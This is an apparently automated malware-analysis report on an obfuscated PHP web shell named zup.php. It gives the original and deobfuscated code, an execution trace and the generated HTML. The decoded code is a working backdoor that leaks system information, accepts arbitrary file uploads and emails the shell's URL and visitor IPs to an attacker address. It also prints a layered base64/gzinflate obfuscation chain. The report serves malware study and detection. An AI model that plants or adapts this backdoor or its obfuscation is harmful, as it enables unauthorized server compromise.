PHP Malware Analysis

zup.inc, zup.php

md5: 24a26b8aeee0368cc278f8b4d1750048

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

URLs
  • http://localhost/uploads/zup.php (Traces)


Deobfuscated PHP code

<?php

//Script By Batosay1337
//Bypass 404 403
$unknown = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHVrNDUlMjklMjklMjklMjklMjklMjklMjklMjklM0I=";
$uk45 = "==gz574B6rgkxfA9PWti/4voHPlgSL0D/yLe5FQaG6U9lFcHCDMiSLs7u3AgT/oxk/GIztQorhAyiywOo3f4r+bUC/tNmfzJBR4TY8MLtUCOdFhwNTZyCysfMQyKFDNHgtN7e3aOCzg/QkEso1hA9Vf3EJ2QCOOHT3Bv1liUzGLXv51uXuMo9RT3LxT5/xcDtY5v22hN/JUh3EjVCQ+0Y0vDFHgdLt4TqtiVe/IGIBPWEWXMzfO6aoiC7LTqVUSutXmelwUiglKlxEAePOGKGPRPw3pWIx4LwhrPLgWbZihW1PfLzTncq6mbklpl/awrL6gnX/aGkvMk4ftiEj4EOX6I8GjJanoTlDASH7wLnnU8S7wiptzEs/rzAEhbbGtVqhJq/SsbiuaRQLh6zl4b0KDKlpU28sSCcSe743kmuooTnKDYHOqhB/KQtmGPaQ+1raMPUZrw1+g8Eyp3dVJRzxCo09fP+mk9pCcQT0yaVgw5MlM6BgOpkHXHr2B9boJlT0MJ63yeFyGiJYhVJWfFjJAppITtgXud9Wk58qCePzynUUhixWj6acsSvrV99It5WSvvO/8H3vsK48WldnZnZqd2gpfrIBJkZX/75XlAa190+i9rBCvO0BivB2KNpgAmSKBQI6nktCsKnh0Ts9j4HxHEAp9bdNVjcin/LEA9BwJe+DQA/HQ/7LABB0v9CkQA";
eval("?>Batosay1337<br><br>\r\n<?php \r\necho php_uname();\r\n?>\r\n<form method=\"post\" enctype=\"multipart/form-data\">\r\n  <input type=\"file\" name=\"uk45\">\r\n  <button>Batosay1337</button>\r\n</form>\r\n<?php\r\nif (isset(\$_FILES['uk45'])) {\r\n  file_put_contents(\$_FILES['uk45']['name'], file_get_contents(\$_FILES['uk45']['tmp_name']));\r\n  if (file_exists(\"./\".\$_FILES['uk45']['name'])) {\r\n    echo \"oklh !\";\r\n  } else {\r\n    echo \"Fail !\";\r\n  }\r\n}\r\n?>\r\n<?php\r\n@ini_set('output_buffering', 0);\r\n@ini_set('display_errors', 0);\r\nset_time_limit(0);\r\nini_set('memory_limit', '64M');\r\nheader('Content-Type: text/html; charset=UTF-8');\r\n\$tujuanmail = '[email protected]';\r\n\$x_path = \"http://\" . \$_SERVER['SERVER_NAME'] . \$_SERVER['REQUEST_URI'];\r\n\$pesan_alert = \"Masuk \$x_path :p *IP Address : [ \" . \$_SERVER['REMOTE_ADDR'] . \" ]\";\r\nmail(\$tujuanmail, \"LOGGER\", \$pesan_alert, \"[ \" . \$_SERVER['REMOTE_ADDR'] . \" ]\");\r\n?>");
exit;

Execution traces

data/traces/24a26b8aeee0368cc278f8b4d1750048_trace-1676238923.5153.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:55:49.413128]
1	0	1	0.000313	393512
1	3	0	0.000385	395144	{main}	1		/var/www/html/uploads/zup.php	0	0
1		A						/var/www/html/uploads/zup.php	6	$unknown = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHVrNDUlMjklMjklMjklMjklMjklMjklMjklMjklM0I='
1		A						/var/www/html/uploads/zup.php	7	$uk45 = '==gz574B6rgkxfA9PWti/4voHPlgSL0D/yLe5FQaG6U9lFcHCDMiSLs7u3AgT/oxk/GIztQorhAyiywOo3f4r+bUC/tNmfzJBR4TY8MLtUCOdFhwNTZyCysfMQyKFDNHgtN7e3aOCzg/QkEso1hA9Vf3EJ2QCOOHT3Bv1liUzGLXv51uXuMo9RT3LxT5/xcDtY5v22hN/JUh3EjVCQ+0Y0vDFHgdLt4TqtiVe/IGIBPWEWXMzfO6aoiC7LTqVUSutXmelwUiglKlxEAePOGKGPRPw3pWIx4LwhrPLgWbZihW1PfLzTncq6mbklpl/awrL6gnX/aGkvMk4ftiEj4EOX6I8GjJanoTlDASH7wLnnU8S7wiptzEs/rzAEhbbGtVqhJq/SsbiuaRQLh6zl4b0KDKlpU28sSCcSe743kmuooTnKDYHOqhB/KQtmGPaQ+1raMPUZrw1+g8Eyp3dVJRzxCo09fP+mk9pCcQT0yaVgw5MlM6BgOpkHXHr2B9boJl'
2	4	0	0.000451	395144	base64_decode	0		/var/www/html/uploads/zup.php	8	1	'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHVrNDUlMjklMjklMjklMjklMjklMjklMjklMjklM0I='
2	4	1	0.000473	395432
2	4	R			'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24uk45%29%29%29%29%29%29%29%29%3B'
2	5	0	0.000493	395400	urldecode	0		/var/www/html/uploads/zup.php	8	1	'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24uk45%29%29%29%29%29%29%29%29%3B'
2	5	1	0.000513	395624
2	5	R			'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($uk45))))))));'
2	6	0	0.000532	395336	htmlspecialchars_decode	0		/var/www/html/uploads/zup.php	8	1	'eval(&quot;?&gt;&quot;.gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($uk45))))))));'
2	6	1	0.000551	395560
2	6	R			'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($uk45))))))));'
2	7	0	0.000581	397680	eval	1	'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($uk45))))))));'	/var/www/html/uploads/zup.php	8	0
3	8	0	0.000598	397680	strrev	0		/var/www/html/uploads/zup.php(8) : eval()'d code	1	1	'==gz574B6rgkxfA9PWti/4voHPlgSL0D/yLe5FQaG6U9lFcHCDMiSLs7u3AgT/oxk/GIztQorhAyiywOo3f4r+bUC/tNmfzJBR4TY8MLtUCOdFhwNTZyCysfMQyKFDNHgtN7e3aOCzg/QkEso1hA9Vf3EJ2QCOOHT3Bv1liUzGLXv51uXuMo9RT3LxT5/xcDtY5v22hN/JUh3EjVCQ+0Y0vDFHgdLt4TqtiVe/IGIBPWEWXMzfO6aoiC7LTqVUSutXmelwUiglKlxEAePOGKGPRPw3pWIx4LwhrPLgWbZihW1PfLzTncq6mbklpl/awrL6gnX/aGkvMk4ftiEj4EOX6I8GjJanoTlDASH7wLnnU8S7wiptzEs/rzAEhbbGtVqhJq/SsbiuaRQLh6zl4b0KDKlpU28sSCcSe743kmuooTnKDYHOqhB/KQtmGPaQ+1raMPUZrw1+g8Eyp3dVJRzxCo09fP+mk9pCcQT0yaVgw5MlM6BgOpkHXHr2B9boJl'
3	8	1	0.000623	398480
3	8	R			'AQkC9v0BBAL7/QH/AQD+eJwB9AEL/nicjVNdb9pAEHxH4j9sT0hnKsCtkn6IQBKSmAgpNK2BviB0OvCBr9i+091aAlX57/XZkJBIrfpg2dqZnZndlW84Ksv3H8/OvvSW5tI99VrvSsca6jWxihUUnyzPeCq85kW9duXgtTIppAJjFfWJVhYJiGyFey36JM0TlJob9B2rHXHkpOgB6MlM5wgVay0TQcCp9km+Pf90oCxzRJVd3pyE8g+1wrZUPMar1+QaPGmtQK/BhqOHYDKnTooumk347eScCSs82UplKDK0b4lz6hLQRauibsS/qJhqVtGbbhEAzr/sEztpiw7S8UnnLw7HSADlTonaJjG8I6XOE4jEitf4kMvkGa/Xng6Lrwa/lplkbm6qcnTzLfP1WhiZbWgLPrhwL4xIWp3wPRPGKGOPeAExlKlgiUwlemXtuSUVqTL7Cioa6OfzMXWEWPBIGI/eVitqT4tLdgHFDv0Y0+QCVjE3hUJ/Nh22v5Yt'
3	9	0	0.000650	398448	base64_decode	0		/var/www/html/uploads/zup.php(8) : eval()'d code	1	1	'AQkC9v0BBAL7/QH/AQD+eJwB9AEL/nicjVNdb9pAEHxH4j9sT0hnKsCtkn6IQBKSmAgpNK2BviB0OvCBr9i+091aAlX57/XZkJBIrfpg2dqZnZndlW84Ksv3H8/OvvSW5tI99VrvSsca6jWxihUUnyzPeCq85kW9duXgtTIppAJjFfWJVhYJiGyFey36JM0TlJob9B2rHXHkpOgB6MlM5wgVay0TQcCp9km+Pf90oCxzRJVd3pyE8g+1wrZUPMar1+QaPGmtQK/BhqOHYDKnTooumk347eScCSs82UplKDK0b4lz6hLQRauibsS/qJhqVtGbbhEAzr/sEztpiw7S8UnnLw7HSADlTonaJjG8I6XOE4jEitf4kMvkGa/Xng6Lrwa/lplkbm6qcnTzLfP1WhiZbWgLPrhwL4xIWp3wPRPGKGOPeAExlKlgiUwlemXtuSUVqTL7Cioa6OfzMXWEWPBIGI/eVitqT4tLdgHFDv0Y0+QCVjE3hUJ/Nh22v5Yt'
3	9	1	0.000675	399248
3	9	R			'\001\t\002��\001\004\002��\001�\001\000�x�\001�\001\v�x��S]o�@\020|G�?lOHg*���~�@\022��\b)4��� t:�ؾ��Z\002U��ِ�H��`�ڙ��ݕo8*�\037�ξ���=�Z�J�\032�5��\025\024�,�x*��E�v��2)�\002c\025��V\026\t�l�{-�$�\023��\033�\035�\035q��\001��L�\b\025k-\023A���I�=�t�,sD�]ޜ��\017�¶T<ƫ��\032<i�@�����`2�N�.�M���\t+<�Je(2�o�s�\022�E��nĿ��jVћn\021\000ο�\023;i�\016��I�/\016�H\000�N��&1�#��\023�Ċ����\031�מ\016��\006���dnn�rt�-�Z\030�mh\v>�p/�HZ��=\023�(c�x\0011��`�L%ze�%\025�2�\n*\032���1u�X�H\030��V+jO�Kv\0'
3	10	0	0.000733	398448	gzinflate	0		/var/www/html/uploads/zup.php(8) : eval()'d code	1	1	'\001\t\002��\001\004\002��\001�\001\000�x�\001�\001\v�x��S]o�@\020|G�?lOHg*���~�@\022��\b)4��� t:�ؾ��Z\002U��ِ�H��`�ڙ��ݕo8*�\037�ξ���=�Z�J�\032�5��\025\024�,�x*��E�v��2)�\002c\025��V\026\t�l�{-�$�\023��\033�\035�\035q��\001��L�\b\025k-\023A���I�=�t�,sD�]ޜ��\017�¶T<ƫ��\032<i�@�����`2�N�.�M���\t+<�Je(2�o�s�\022�E��nĿ��jVћn\021\000ο�\023;i�\016��I�/\016�H\000�N��&1�#��\023�Ċ����\031�מ\016��\006���dnn�rt�-�Z\030�mh\v>�p/�HZ��=\023�(c�x\0011��`�L%ze�%\025�2�\n*\032���1u�X�H\030��V+jO�Kv\0'
3	10	1	0.000794	399120
3	10	R			'\001\004\002��\001�\001\000�x�\001�\001\v�x��S]o�@\020|G�?lOHg*���~�@\022��\b)4��� t:�ؾ��Z\002U��ِ�H��`�ڙ��ݕo8*�\037�ξ���=�Z�J�\032�5��\025\024�,�x*��E�v��2)�\002c\025��V\026\t�l�{-�$�\023��\033�\035�\035q��\001��L�\b\025k-\023A���I�=�t�,sD�]ޜ��\017�¶T<ƫ��\032<i�@�����`2�N�.�M���\t+<�Je(2�o�s�\022�E��nĿ��jVћn\021\000ο�\023;i�\016��I�/\016�H\000�N��&1�#��\023�Ċ����\031�מ\016��\006���dnn�rt�-�Z\030�mh\v>�p/�HZ��=\023�(c�x\0011��`�L%ze�%\025�2�\n*\032���1u�X�H\030��V+jO�Kv\001�\016�\030'
3	11	0	0.000849	398320	gzinflate	0		/var/www/html/uploads/zup.php(8) : eval()'d code	1	1	'\001\004\002��\001�\001\000�x�\001�\001\v�x��S]o�@\020|G�?lOHg*���~�@\022��\b)4��� t:�ؾ��Z\002U��ِ�H��`�ڙ��ݕo8*�\037�ξ���=�Z�J�\032�5��\025\024�,�x*��E�v��2)�\002c\025��V\026\t�l�{-�$�\023��\033�\035�\035q��\001��L�\b\025k-\023A���I�=�t�,sD�]ޜ��\017�¶T<ƫ��\032<i�@�����`2�N�.�M���\t+<�Je(2�o�s�\022�E��nĿ��jVћn\021\000ο�\023;i�\016��I�/\016�H\000�N��&1�#��\023�Ċ����\031�מ\016��\006���dnn�rt�-�Z\030�mh\v>�p/�HZ��=\023�(c�x\0011��`�L%ze�%\025�2�\n*\032���1u�X�H\030��V+jO�Kv\001�\016�\030'
3	11	1	0.000900	398992
3	11	R			'\001�\001\000�x�\001�\001\v�x��S]o�@\020|G�?lOHg*���~�@\022��\b)4��� t:�ؾ��Z\002U��ِ�H��`�ڙ��ݕo8*�\037�ξ���=�Z�J�\032�5��\025\024�,�x*��E�v��2)�\002c\025��V\026\t�l�{-�$�\023��\033�\035�\035q��\001��L�\b\025k-\023A���I�=�t�,sD�]ޜ��\017�¶T<ƫ��\032<i�@�����`2�N�.�M���\t+<�Je(2�o�s�\022�E��nĿ��jVћn\021\000ο�\023;i�\016��I�/\016�H\000�N��&1�#��\023�Ċ����\031�מ\016��\006���dnn�rt�-�Z\030�mh\v>�p/�HZ��=\023�(c�x\0011��`�L%ze�%\025�2�\n*\032���1u�X�H\030��V+jO�Kv\001�\016�\030��\002V17�B6\'
3	12	0	0.000952	398320	gzinflate	0		/var/www/html/uploads/zup.php(8) : eval()'d code	1	1	'\001�\001\000�x�\001�\001\v�x��S]o�@\020|G�?lOHg*���~�@\022��\b)4��� t:�ؾ��Z\002U��ِ�H��`�ڙ��ݕo8*�\037�ξ���=�Z�J�\032�5��\025\024�,�x*��E�v��2)�\002c\025��V\026\t�l�{-�$�\023��\033�\035�\035q��\001��L�\b\025k-\023A���I�=�t�,sD�]ޜ��\017�¶T<ƫ��\032<i�@�����`2�N�.�M���\t+<�Je(2�o�s�\022�E��nĿ��jVћn\021\000ο�\023;i�\016��I�/\016�H\000�N��&1�#��\023�Ċ����\031�מ\016��\006���dnn�rt�-�Z\030�mh\v>�p/�HZ��=\023�(c�x\0011��`�L%ze�%\025�2�\n*\032���1u�X�H\030��V+jO�Kv\001�\016�\030��\002V17�B6\'
3	12	1	0.001002	398992
3	12	R			'x�\001�\001\v�x��S]o�@\020|G�?lOHg*���~�@\022��\b)4��� t:�ؾ��Z\002U��ِ�H��`�ڙ��ݕo8*�\037�ξ���=�Z�J�\032�5��\025\024�,�x*��E�v��2)�\002c\025��V\026\t�l�{-�$�\023��\033�\035�\035q��\001��L�\b\025k-\023A���I�=�t�,sD�]ޜ��\017�¶T<ƫ��\032<i�@�����`2�N�.�M���\t+<�Je(2�o�s�\022�E��nĿ��jVћn\021\000ο�\023;i�\016��I�/\016�H\000�N��&1�#��\023�Ċ����\031�מ\016��\006���dnn�rt�-�Z\030�mh\v>�p/�HZ��=\023�(c�x\0011��`�L%ze�%\025�2�\n*\032���1u�X�H\030��V+jO�Kv\001�\016�\030��\002V17�B6\035���-\r��<K�4}�˗�^o\\��R)u�\035�\034�CbD�}\002\035h�I\020�\f�9����`\034��+$\f~̂ɔ��\021]8%-,�\030O�A\'7�6��Q����;\f��\bk�\vs o�ƏӀ\r���҈��\035�e�N�i\001yx��\017B҂SǢ�?�Տ�\a�\n�\a���'
3	13	0	0.001062	398320	gzuncompress	0		/var/www/html/uploads/zup.php(8) : eval()'d code	1	1	'x�\001�\001\v�x��S]o�@\020|G�?lOHg*���~�@\022��\b)4��� t:�ؾ��Z\002U��ِ�H��`�ڙ��ݕo8*�\037�ξ���=�Z�J�\032�5��\025\024�,�x*��E�v��2)�\002c\025��V\026\t�l�{-�$�\023��\033�\035�\035q��\001��L�\b\025k-\023A���I�=�t�,sD�]ޜ��\017�¶T<ƫ��\032<i�@�����`2�N�.�M���\t+<�Je(2�o�s�\022�E��nĿ��jVћn\021\000ο�\023;i�\016��I�/\016�H\000�N��&1�#��\023�Ċ����\031�מ\016��\006���dnn�rt�-�Z\030�mh\v>�p/�HZ��=\023�(c�x\0011��`�L%ze�%\025�2�\n*\032���1u�X�H\030��V+jO�Kv\001�\016�\030��\002V17�B6\035���-\r��<K�4}�˗�^o\\��R)u�\035�\034�CbD�}\002\035h�I\020�\f�9����`\034��+$\f~̂ɔ��\021]8%-,�\030O�A\'7�6��Q����;\f��\bk�\vs o�ƏӀ\r���҈��\035�e�N�i\001yx��\017B҂SǢ�?�Տ�\a�\n�\a���'
3	13	1	0.001119	398992
3	13	R			'x��S]o�@\020|G�?lOHg*���~�@\022��\b)4��� t:�ؾ��Z\002U��ِ�H��`�ڙ��ݕo8*�\037�ξ���=�Z�J�\032�5��\025\024�,�x*��E�v��2)�\002c\025��V\026\t�l�{-�$�\023��\033�\035�\035q��\001��L�\b\025k-\023A���I�=�t�,sD�]ޜ��\017�¶T<ƫ��\032<i�@�����`2�N�.�M���\t+<�Je(2�o�s�\022�E��nĿ��jVћn\021\000ο�\023;i�\016��I�/\016�H\000�N��&1�#��\023�Ċ����\031�מ\016��\006���dnn�rt�-�Z\030�mh\v>�p/�HZ��=\023�(c�x\0011��`�L%ze�%\025�2�\n*\032���1u�X�H\030��V+jO�Kv\001�\016�\030��\002V17�B6\035���-\r��<K�4}�˗�^o\\��R)u�\035�\034�CbD�}\002\035h�I\020�\f�9����`\034��+$\f~̂ɔ��\021]8%-,�\030O�A\'7�6��Q����;\f��\bk�\vs o�ƏӀ\r���҈��\035�e�N�i\001yx��\017B҂SǢ�?�Տ�\a�\n�'
3	14	0	0.001181	398320	gzuncompress	0		/var/www/html/uploads/zup.php(8) : eval()'d code	1	1	'x��S]o�@\020|G�?lOHg*���~�@\022��\b)4��� t:�ؾ��Z\002U��ِ�H��`�ڙ��ݕo8*�\037�ξ���=�Z�J�\032�5��\025\024�,�x*��E�v��2)�\002c\025��V\026\t�l�{-�$�\023��\033�\035�\035q��\001��L�\b\025k-\023A���I�=�t�,sD�]ޜ��\017�¶T<ƫ��\032<i�@�����`2�N�.�M���\t+<�Je(2�o�s�\022�E��nĿ��jVћn\021\000ο�\023;i�\016��I�/\016�H\000�N��&1�#��\023�Ċ����\031�מ\016��\006���dnn�rt�-�Z\030�mh\v>�p/�HZ��=\023�(c�x\0011��`�L%ze�%\025�2�\n*\032���1u�X�H\030��V+jO�Kv\001�\016�\030��\002V17�B6\035���-\r��<K�4}�˗�^o\\��R)u�\035�\034�CbD�}\002\035h�I\020�\f�9����`\034��+$\f~̂ɔ��\021]8%-,�\030O�A\'7�6��Q����;\f��\bk�\vs o�ƏӀ\r���҈��\035�e�N�i\001yx��\017B҂SǢ�?�Տ�\a�\n�'
3	14	1	0.001247	399376
3	14	R			'Batosay1337<br><br>\r\n<?php \r\necho php_uname();\r\n?>\r\n<form method="post" enctype="multipart/form-data">\r\n  <input type="file" name="uk45">\r\n  <button>Batosay1337</button>\r\n</form>\r\n<?php\r\nif (isset($_FILES[\'uk45\'])) {\r\n  file_put_contents($_FILES[\'uk45\'][\'name\'], file_get_contents($_FILES[\'uk45\'][\'tmp_name\']));\r\n  if (file_exists("./".$_FILES[\'uk45\'][\'name\'])) {\r\n    echo "oklh !";\r\n  } else {\r\n    echo "Fail !";\r\n  }\r\n}\r\n?>\r\n<?php\r\n@ini_set(\'output_buffer'
3	15	0	0.001326	406656	eval	1	'?>Batosay1337<br><br>\r\n<?php \r\necho php_uname();\r\n?>\r\n<form method="post" enctype="multipart/form-data">\r\n  <input type="file" name="uk45">\r\n  <button>Batosay1337</button>\r\n</form>\r\n<?php\r\nif (isset($_FILES[\'uk45\'])) {\r\n  file_put_contents($_FILES[\'uk45\'][\'name\'], file_get_contents($_FILES[\'uk45\'][\'tmp_name\']));\r\n  if (file_exists("./".$_FILES[\'uk45\'][\'name\'])) {\r\n    echo "oklh !";\r\n  } else {\r\n    echo "Fail !";\r\n  }\r\n}\r\n?>\r\n<?php\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$tujuanmail = \'[email protected]\';\r\n$x_path = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$pesan_alert = "Masuk $x_path :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\n?>'	/var/www/html/uploads/zup.php(8) : eval()'d code	1	0
4	16	0	0.001371	406656	php_uname	0		/var/www/html/uploads/zup.php(8) : eval()'d code(1) : eval()'d code	3	0
4	16	1	0.001387	406768
4	16	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
4	17	0	0.001408	406656	ini_set	0		/var/www/html/uploads/zup.php(8) : eval()'d code(1) : eval()'d code	20	2	'output_buffering'	0
4	17	1	0.001426	406728
4	17	R			FALSE
4	18	0	0.001439	406656	ini_set	0		/var/www/html/uploads/zup.php(8) : eval()'d code(1) : eval()'d code	21	2	'display_errors'	0
4	18	1	0.001455	406728
4	18	R			''
4	19	0	0.001468	406656	set_time_limit	0		/var/www/html/uploads/zup.php(8) : eval()'d code(1) : eval()'d code	22	1	0
4	19	1	0.001484	406720
4	19	R			FALSE
4	20	0	0.001497	406688	ini_set	0		/var/www/html/uploads/zup.php(8) : eval()'d code(1) : eval()'d code	23	2	'memory_limit'	'64M'
4	20	1	0.001513	406792
4	20	R			'128M'
4	21	0	0.001526	406688	header	0		/var/www/html/uploads/zup.php(8) : eval()'d code(1) : eval()'d code	24	1	'Content-Type: text/html; charset=UTF-8'
4	21	1	0.001544	406864
4	21	R			NULL
3		A						/var/www/html/uploads/zup.php(8) : eval()'d code(1) : eval()'d code	25	$tujuanmail = '[email protected]'
3		A						/var/www/html/uploads/zup.php(8) : eval()'d code(1) : eval()'d code	26	$x_path = 'http://localhost/uploads/zup.php'
3		A						/var/www/html/uploads/zup.php(8) : eval()'d code(1) : eval()'d code	27	$pesan_alert = 'Masuk http://localhost/uploads/zup.php :p *IP Address : [ 127.0.0.1 ]'
4	22	0	0.001600	407032	mail	0		/var/www/html/uploads/zup.php(8) : eval()'d code(1) : eval()'d code	28	4	'[email protected]'	'LOGGER'	'Masuk http://localhost/uploads/zup.php :p *IP Address : [ 127.0.0.1 ]'	'[ 127.0.0.1 ]'
4	22	1	0.002456	407176
4	22	R			FALSE
3	15	1	0.002482	406992
2	7	1	0.002492	399840
			0.002528	318048
TRACE END   [2023-02-12 19:55:49.415485]


Generated HTML code

<html><head></head><body>Batosay1337<br><br>
Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64<form method="post" enctype="multipart/form-data">
  <input type="file" name="uk45">
  <button>Batosay1337</button>
</form>
</body></html>

Original PHP code

<?php

//Script By Batosay1337
//Bypass 404 403

$unknown = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNHVrNDUlMjklMjklMjklMjklMjklMjklMjklMjklM0I=";
$uk45 = "==gz574B6rgkxfA9PWti/4voHPlgSL0D/yLe5FQaG6U9lFcHCDMiSLs7u3AgT/oxk/GIztQorhAyiywOo3f4r+bUC/tNmfzJBR4TY8MLtUCOdFhwNTZyCysfMQyKFDNHgtN7e3aOCzg/QkEso1hA9Vf3EJ2QCOOHT3Bv1liUzGLXv51uXuMo9RT3LxT5/xcDtY5v22hN/JUh3EjVCQ+0Y0vDFHgdLt4TqtiVe/IGIBPWEWXMzfO6aoiC7LTqVUSutXmelwUiglKlxEAePOGKGPRPw3pWIx4LwhrPLgWbZihW1PfLzTncq6mbklpl/awrL6gnX/aGkvMk4ftiEj4EOX6I8GjJanoTlDASH7wLnnU8S7wiptzEs/rzAEhbbGtVqhJq/SsbiuaRQLh6zl4b0KDKlpU28sSCcSe743kmuooTnKDYHOqhB/KQtmGPaQ+1raMPUZrw1+g8Eyp3dVJRzxCo09fP+mk9pCcQT0yaVgw5MlM6BgOpkHXHr2B9boJlT0MJ63yeFyGiJYhVJWfFjJAppITtgXud9Wk58qCePzynUUhixWj6acsSvrV99It5WSvvO/8H3vsK48WldnZnZqd2gpfrIBJkZX/75XlAa190+i9rBCvO0BivB2KNpgAmSKBQI6nktCsKnh0Ts9j4HxHEAp9bdNVjcin/LEA9BwJe+DQA/HQ/7LABB0v9CkQA";
eval(htmlspecialchars_decode(urldecode(base64_decode($unknown))));
exit;
?>